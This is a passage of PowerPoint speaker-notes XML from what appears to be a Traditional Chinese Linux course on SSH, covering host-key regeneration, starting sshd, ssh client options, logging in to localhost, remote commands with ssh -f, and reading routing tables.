              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>* 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6606"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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[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@ww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~]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>date; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>ssh_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>*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Mon Jul 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>11:36:12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CST 2011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----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668 Jul 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>11:35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_host_dsa_key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r--r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590 Jul 25 11:35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ssh_host_dsa_key.pub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----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963 Jul 25 11:35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_host_key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r--r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627 Jul 25 11:35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ssh_host_key.pub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----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1675 Jul 25 11:35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_host_rsa_key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</a:t>
            </a:r>
          </a:p>
          <a:p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w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-r--r--. 1 root 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root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 382 Jul 25 11:35 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etc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>/ssh_host_rsa_key.pub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>看一下上面輸出的日期與檔案的建立時間，剛剛建立的新公鑰、私鑰系統！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t> 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6404582"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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(Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>SHell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> protocol) (Port:22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟動本機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Server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/etc/init.d/sshd restart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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1400" b="1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algn="l"/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netstat -tlnp | grep ssh</a:t>
            </a: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Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 :::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22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 :::* LISTEN 1539/sshd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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1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端服務</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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ssh [-f] [-o 參數項目] [-p 非正規埠口] [帳號@]IP [指令]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選項與參數：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lvl="0" eaLnBrk="0" hangingPunct="0"/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f ：不</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW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遠端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登入主機直接發送一個指令過去；</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW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需要配合後面的 [指令]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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  PS.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強迫在遠端主機執行指令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW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r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>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o 參數項目：主要的參數項目有：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ConnectTimeout=秒數 ：連線等待的秒數，減少等待的時間 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StrictHostKeyChecking=[yes|no|ask]：預設是 ask，若要讓 public key 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主動加入 known_hosts ，則可以設定為 no 即可。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p ：如果你的 sshd 服務啟動在非正規的埠口 (22)，需使用此項目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[指令] ：不登入遠端主機，直接發送指令過去。但與 -f 意義不相同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endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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  PS.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因為要等到遠端主機跑完結果，所以畫面會有卡住的可能。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean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2595154"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接連線登入到對方主機的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本機為例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www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# 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127.0.0.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is eb:12:07:84:b9:3b:3f:e4:ad:ba:f1:85:41:fc:18:3b. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Are you sure you want to continue connecting (yes/no)?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="2800" b="1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yes</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts. root@127.0.0.1's password: &lt;==在這裡輸入 root 的密碼即可！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www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# exit</a:t>
            </a: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6072298"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接連線登入到對方主機的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本機為例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is eb:12:07:84:b9:3b:3f:e4:ad:ba:f1:85:41:fc:18:3b. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Are you sure you want to continue connecting (yes/no)?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="2800" b="1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yes</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若接收的公鑰尚未記錄，則詢問使用者是否記錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若要記錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>範例中回答 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>yes </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的那個步驟</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>則寫入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>known_hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>且繼續登入的後續工作；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若不記錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回答 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>no) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>則不寫入該檔案，並且離開登入工作；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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11757938"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>帳號登入本機 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www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# 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student@127.0.0.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>student@127.0.0.1's password: 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student@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]$ exit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>由於加入帳號，因此切換身份成為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了！另外，因為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>曾登入過。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所以就不會再出現提示你要增加主機公鑰的訊息囉！ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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376125"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登入對方主機執行過指令後立刻離開的方式：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www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# 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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>student@127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/shutdown -h 3 'system will shutdown in 3 minutes' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>student@localhost's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> password: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>此時你會發現怎麼畫面卡住了？這是因為上頭的指令所造成經登入遠端主機，但是執行的指令尚未跑完，所以會在等待中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>那如何指定系統自己跑呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>請看下個範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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4393023"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與上方範例類似，讓對方主機自己跑指令，你立刻回到近端主機繼續工作： </a:t>
            </a:r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 smtClean="0"/>
              <a:t>root@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# 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-f student@127.0.0.1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/shutdown -h 3 'system will shutdown in 3 minutes'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>此時你會立刻登出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，但 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shutdown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令會自己在遠端伺服器跑喔！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40390805"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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 smtClean="0"/>
              <a:t>觀察用選項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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：不要使用通訊協定或主機名稱，直接使用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port number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：使用更詳細的資訊來顯示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資訊顯示路由，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Destination(network ID), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Genmask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mask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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Gateway (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>從哪裡連出去、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0.0.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 表示直接由本機傳出，預設閘道則會有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>FLAG:U (route is up)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：該路由是啟動的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>G (use gateway)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：需要透過外部的主機 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(gateway) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來轉遞封包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：這個路由傳遞封包的介面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>內建路由順序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>小網域 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(192.168.1.0/24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Class C)→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大網域 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
